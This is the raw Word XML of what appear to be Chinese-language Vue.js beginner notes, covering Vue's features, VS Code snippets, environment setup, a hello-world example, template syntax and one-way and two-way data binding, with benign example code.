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vue简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·动态构建用户界面的渐进式 JavaScript 框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Vue 的特点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·采用组件化模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 提高代码复用率，让代码更好的维护</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·声明式编码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 让编码人员无需直接操作DOM，提高开发效率</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·使用虚拟DOM和优秀的Diff算法，尽量复用DOM节点</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·遵循 MVVM 模式</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·编码简洁, 体积小, 运行效率高, 适合移动/PC 端开发</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·它本身只关注 UI, 也可以引入其它第三方库开发项目</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>与其它 JS 框架的关联</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·借鉴 Angular 的模板和数据绑定技术</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·借鉴 React 的组件化和虚拟 DOM 技术</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vscode用户代码片段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·用于快速生成指定代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 如：scr --&gt; &lt;script type="text/javascript"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·打开用户代码片段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1589405" cy="2310130"/>
            <wp:effectExtent l="0" t="0" r="1079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894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·新建全局代码片段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3171190"/>
            <wp:effectExtent l="0" t="0" r="190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·编写代码片段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="3193415"/>
            <wp:effectExtent l="0" t="0" r="1397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Place your 全局 snippets here. Each snippet is defined under a snippet name and has a scope, prefix, body and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description. Add comma separated ids of the languages where the snippet is applicable in the scope field. If scope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is left empty or omitted, the snippet gets applied to all languages. The prefix is what is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used to trigger the snippet and the body will be expanded and inserted. Possible variables are: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$1, $2 for tab stops, $0 for the final cursor position, and ${1:label}, ${2:another} for placeholders.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Placeholders with the same ids are connected.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Example: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"Print to console"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"scope"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"javascript,typescript"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"prefix"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"body"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"console.log('$1');"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"$2"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"description"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"Log output to console"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"Print to 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"scope"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"html,javascript,typescript"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"prefix"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"body"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"&lt;script type=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\"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text/javascript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\"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&gt;&lt;/script&gt;"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"$2"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"description"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"Log output to console"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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建Vue开发环境</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·下载vue.js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"https://cn.vuejs.org/v2/guide/installation.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://cn.vuejs.org/v2/guide/installation.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·谷歌安装devtools插件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vscode安装live server插件</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·vscode安装Vue 3 Snippets插件</w:t>
      </w:r>
    </w:p>
    <w:p/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&lt;!DOCTYPE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>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&lt;html </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>="en"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>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>&lt;head&gt;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    &lt;meta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>charset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>="UTF-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>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    &lt;meta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>http-equiv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t xml:space="preserve">="X-UA-Compatible" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>="IE=edge"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>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    &lt;meta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t xml:space="preserve">="viewport" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>="width=device-width, initial-scale=1.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>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    &lt;title&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A9B7C6"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>&lt;/title&gt;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>&lt;/head&gt;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>&lt;body&gt;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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>&lt;!--引入vue.js--&gt;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&lt;script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t xml:space="preserve">="text/javascript" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>="../js/vue.js"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>&gt;&lt;/script&gt;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&lt;script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="BABABA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A5C261"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>="text/javascript"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="宋体"/>
          <w:color w:val="808080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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>//全局配置，阻止 vue 在启动时生成生产提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="宋体"/>
          <w:color w:val="CC7832"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="9876AA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>Vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A9B7C6"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="9876AA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A9B7C6"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="9876AA"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t xml:space="preserve">productionTip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="A9B7C6"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="CC7832"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>false;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>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="宋体"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="E8BF6A"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hello案例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·想让Vue工作，就必须创建一个Vue实例，且要传入一个配置对象</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·root容器里的代码依然符合html规范，只不过混入了一些特殊的Vue语法</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·root容器里的代码被称为【Vue模板】</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue实例和容器是一一对应的</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·真实开发中只有一个Vue实例，并且会配合着组件一起使用</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·{{xxx}}中的xxx要写js表达式，且xxx可以自动读取到data中的所有属性</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·一旦data中的数据发生改变，那么页面中用到该数据的地方也会自动更新</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·注意区分js表达式 和 js代码(语句)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式：一个表达式会产生一个值，可以放在任何一个需要值的地方：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>-- a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>-- a+b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>-- demo(1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>-- x === y ? 'a' : 'b'</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js代码(语句)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>-- if(){}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>-- for(){}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·将页签图标放入根路径</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1724660"/>
            <wp:effectExtent l="0" t="0" r="1460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"en"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http-equiv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"X-UA-Compatible"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"IE=edge"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"viewport"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"width=device-width, initial-scale=1.0"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&lt;!--插入data对象的数据--&gt;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hello，{{name.toUpperCase()}}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年龄：{{age}}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&lt;!--引入vue.js--&gt;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//全局配置，阻止 vue 在启动时生成生产提示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//创建vue实例，传入配置对象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"#root"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//el用于指定当前Vue实例为哪个容器服务，值通常为css选择器字符串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el:document.getElementById("root");//可以这么写，但一般不这么写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//data数据，用于存储数据。数据供el所指定的容器去使用，值暂时写成对象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"AtGuigu"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模板语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·html 中包含了一些JS 语法代码，语法分为两种，分别为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 插值语法（双大括号表达式）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 指令（以v-开头）</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·插值语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 用于解析标签体内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- {{xxx}} ，xxxx 会作为js 表达式解析</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·指令语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- 解析标签属性、解析标签体内容、绑定事件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 举例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- v-bind:href = 'xxxx' ，xxxx 会作为js 表达式被解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 说明</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-- Vue 中有有很多的指令，此处只是用v-bind 举个例子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模板语法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插值语法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你好，{{name}}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指令语法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&lt;!--v-bind指令，为标签中的属性动态绑定值--&gt;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v-bind:href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"school.url.toUpperCase()"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点我去{{school.name}}学习1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&lt;!--v-bind指令可简写为:--&gt;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"school.url"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点我去{{school.name}}学习2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'jack'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url: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'http://www.atguigu.com'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数据绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·Vue中有2种数据绑定的方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单向绑定(v-bind)：数据只能从data流向页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双向绑定(v-model)：数据不仅能从data流向页面，还可以从页面流向data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>·备注</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双向绑定一般都应用在表单类元素上（如：input、select等）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v-model:value 可以简写为 v-model，因为v-model默认收集的就是value值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
